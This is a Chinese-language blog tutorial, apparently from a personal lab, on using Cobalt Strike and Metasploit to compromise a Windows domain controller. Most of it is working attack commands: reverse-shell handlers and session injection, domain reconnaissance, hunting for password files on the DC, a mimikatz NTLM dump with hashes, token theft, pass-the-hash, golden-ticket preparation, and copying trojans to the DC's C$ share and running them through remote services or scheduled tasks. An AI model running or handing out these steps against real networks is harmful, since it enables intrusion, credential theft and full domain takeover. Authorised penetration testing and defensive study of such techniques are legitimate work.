【遠控使用】Cobalt Strike橫向滲透域控


categories:

  • 知識積累
    top: FALSE
    copyright: true
    abbrlink: 1643719980

date: '2021-8-7 12:00:00'

description:1400x780

tags:

  • 內網滲透
  • 提權
  • 滲透測試
  • 黑客工具

photos: https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.png


前言

  • Cobalt Strike的基礎使用,自建的域控,就一臺用

搭建好了域控機

目標:

1、一臺2008R2的DC 192.168.136.133

2、一臺2003 server的域內機器 192.168.136.136

3、一臺2008R2的B2 192.168.136.138

內網滲透拿域控

kali 192.168.1.104

一、cs上線

①直接用web傳遞發現失效了,原因是2003居然沒有powershell,那就傳馬,由于cs馬傳上去無法運行,所以就用msf馬監聽拿到shell

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
run

②接著就將會話轉給cs

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 80
run

二、cs派生會話

首先把它派生會話smb,可以繞防火墻

三、cs的命令使用以及信息收集

1、查看當前用戶組

shell whoami/groups

2、查看域

shell net view /domain

3、枚舉域內主機

shell net view /domain:GYLQ

4、查看DC的ip

shell ping WIN-NQ8TV3JGSN1

接著我發現2003機子太low了,再添加一個2008的機子域內機子繼續下面的測試,直接web傳遞,可以直接上線,server2008

5、查看域內成員

shell net group "domain Computers" /domain

6、查看DC域控主機

shell net group "domain Controllers" /domain
shell nltest/dclist:GYLQ #也可以

7、查看域的信任關系

shell nltest /domain_trusts

8、導入了powershell的模塊powerview.ps1的使用

powershell Invoke-ShareFinder #查看共享的

9、cs的列舉域控命令

net dclist
net dclist /domain

10、列出共享cs命令

net share \\B1

11、判斷是否能訪問域控機的C盤,所以是域超級管理員

shell dir \\WIN-NQ8TV3JGSN1\C$

12、查看域內的管理員

shell net group "enterprise admins" /domain

13、域內的超級管理員

shell net group "domain admins" /domain

14、查看域內組中的超級管理員

shell net localgroup "administrators" /domain

15、cs中的查看管理員組的信息

net group \\WIN-NQ8TV3JGSN1

16、查看遠程的DC的管理員用戶

net localgroup \\WIN-NQ8TV3JGSN1 administrators

17、powerview模塊的命令查看用戶

powershell Get-NetLocalGroup -HostName WIN-NQ8TV3JGSN1

18、單靠命令搜索用戶,或者信息收集

1、查看登陸過的用戶
shell dir /S /B \\WIN-NQ8TV3JGSN1\C$\users

2、查看敏感文件
shell dir /S /B \\WIN-NQ8TV3JGSN1\C$\"*pass*" "*user*" "*config*" "username.*" "password.*"

3、winrm執行powershell
列舉C盤目錄
powershell Invoke-Command -ComputerName WIN-NQ8TV3JGSN1 -ScriptBlock{ dir c:\}

19、通過mimikatz抓取主域的NTLM

msv :   
     [00000003] Primary
     * Username : B1$
     * Domain   : GYLQ
     * NTLM     : ccf1ceaea1d47a0948e5022bd4d7ae64
     * SHA1     : 0ea509056cd0d8ab09f6deeec8ba2db643bae89e

四、內網登陸認證

1、制作token訪問域控

steal_token 2688 域控的超級管理員pID
rev2self 恢復原來的令牌

就可以訪問域控的盤符

2、制作令牌

3、hash認證

pth GYLQ\Administrator 285deb0940e1630b59d2cd9590fcbc91

五、黃金票據

需要:用戶、域名、域id krbtgt的hash

1、查看當前黃金票據

shell klist

2、獲取域SID

shell whoami/user

用戶名           SID                                        
================ ===========================================
b1\administrator S-1-5-21-204603982-2387576990-164658498-500

3、清除當前票據

kerberos_ticket_purge

六、內網橫向滲透獲取權限

方法一

1、生成一個服務木馬為test.exe

然后上傳到windows/users/administrator里面

2、將其復制到域控機內的temp中的命令,然后命名為a1.exe

shell copy C:\Users\administrator\test.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a1.exe

3、然后創建一個服務為a1

shell sc \\WIN-NQ8TV3JGSN1 create a1 binpath= c:\windows\temp\a1.exe

4、接著執行剛剛創建的服務a1

shell sc \\WIN-NQ8TV3JGSN1 start a1

5、接著域控的機子上線CS的system權限

方法二

這次會比較簡單一些,就是定時執行文件

還是創建一個木馬

1、然后保存為a2.exe,按照上面同樣的命令復制到域控機內

shell copy C:\Users\administrator\a2.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a2.exe

查看是否上傳成功
shell dir \\WIN-NQ8TV3JGSN1\C\windows\temp

2、查看域控當前時間

shell net time \\WIN-NQ8TV3JGSN1

3、接著利用at來創建一個一分鐘執行木馬的計劃

shell at \\WIN-NQ8TV3JGSN1 12:58:39 C:\windows\temp\a2.exe

cs上線了

方法三

上面做了個總結,下面是域控機無法聯網的情況怎么辦

1、這是用中轉器來進行獲取域控

2、接著生成一個a3.exe木馬,返回beacon到剛剛創建的監聽器

3、將a3.exe木馬上傳到users\administrator目錄中

4、然后下面命令將木馬復制到域控機內

shell copy C:\Users\administrator\a3.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a3.exe

查看是否復制成功
shell dir \\WIN-NQ8TV3JGSN1\C$\windows\temp

5、查看當前時間和定時執行木馬

shell net time \\WIN-NQ8TV3JGSN1

shell at \\WIN-NQ8TV3JGSN1 13:27:43  C:\windows\temp\a3.exe

6、等到了我們定好的時間,不出網域控會smb形式上線

結果圖

我的個人博客

孤桜懶契:http://gylq.gitee.io

?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容